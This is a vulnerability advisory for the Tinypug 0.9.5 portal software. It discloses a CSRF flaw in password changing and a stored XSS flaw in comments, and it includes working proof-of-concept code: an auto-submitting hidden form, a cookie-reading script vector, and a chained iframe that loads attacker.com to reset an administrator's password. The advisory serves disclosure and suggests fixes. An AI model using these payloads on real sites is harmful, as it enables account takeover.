Tinypug Multiple Vulnerabilities
##########################www.BugReport.ir##################################=
######
#
# AmnPardaz Security Research Team
#
# Title:=09=09Tinypug Multiple Vulnerabilities
# Vendor:=09=09http://platformassociates.com/
# (project hosted at http://code.google.com/p/tinypug/)
# Vulnerable Version:=090.9.5 (and prior versions)
# Exploitation:=09=09Remote with browser
# Fix:=09=09=09N/A
############################################################################=
#######
####################
- Description:
####################
Tinypug is a system for building portals that enable innovation =20
communities and customer inquiry.
The idea is to go beyond one-off statistical surveys (which tend to =20
only verify an existing paradigm)
to foster real collaboration, scalable two-way communication, and =20
anecdotal feedback from users/customers.
####################
- Vulnerability:
####################
+--> CSRF (Cross-Site Request Forgery)
=09The password changing page is vulnerable to CSRF attack. This vulnerabili=
ty
=09can be used to change the password of the victim. For details of this
=09process see "Exploits/PoCs" section.
+--> Stored XSS Vulnerability
=09The comment page is vulnerable to Stored XSS attack. But comments =20
will be published
=09only after administrator confirmation. However this XSS vulnerablity can =
be
=09used in conjunction with the more serious security whole (CSRF) in =20
order to change
=09administrator's password.
####################
- Exploits/PoCs:
####################
+--> Exploiting The CSRF Vulnerability:
=09As any CSRF attack, you need victim to be logged in at target site, =20
namely "victim.com",
=09and visits the attacker's site, namely "attacker.com".
=09Then attacker can change password of the victim (for example to =20
"the-new-password")
=09by presenting following code at attacker.com site:
=09<div>
=09=09<iframe id=3D"if1" name=3D"if1" style=3D"display:none">
=09=09=09This frame is invisible!!
=09=09</iframe>
=09=09<form action=3D"http://victim.com/tinypug-0.9.5/profiles/change_passwo=
rd"
=09=09=09=09method=3D"post" id=3D"the_form" style=3D"display:none" target=3D=
"if1">
=09=09=09<input type=3D"password" name=3D"password" value=3D"the-new-passwor=
d" />
=09=09=09<input type=3D"password" name=3D"password2" value=3D"the-new-passwo=
rd" />
=09=09=09<input type=3D"submit" value=3D"Change Password" />
=09=09</form>
=09=09<script type=3D"text/javascript">
=09=09//<![CDATA[
=09=09=09var $form =3D document.getElementById ('the_form');
=09=09=09$form.submit ();
=09=09//]]>
=09=09</script>
=09</div>
+--> Exploiting The Stored XSS Vulnerability:
=09Simply go to the comment page of a post
=09(for example at =20
"http://victim.com/tinypug-0.9.5/stories/view/welcome#comments")
=09and embed any desired XSS vector like <script>alert(document.cookie)</scr=
ipt>
=09But be aware that comments will be reviewed by administrators before =20
publishing.
+--> Changing Administrator Password by combining above Vulnerabilities:
=09Using the Stored XSS attack, make administrator to see following code:
=09My comment !!! <iframe id=3D"f2" name=3D"f2" =20
src=3D"http://attacker.com/csrf.php" style=3D"display:none" />
=09Then whether he/she approve your comment or not :) his/her password =20
will be changed
=09to "the-new-password" via CSRF attack by visiting implicitly
=09the "http://attacker.com/csrf.php" URI.
####################
- Original Advisory:
####################
http://www.bugreport.ir/index_67.htm
####################
- Solution:
####################
For CSRF vulnerability password changing page must be changed in order =20
to ask for the old password, too.
For XSS vulnerability you could include all of the comments in the =20
approval page by <xmp> tag.
####################
- Credit:
####################
AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com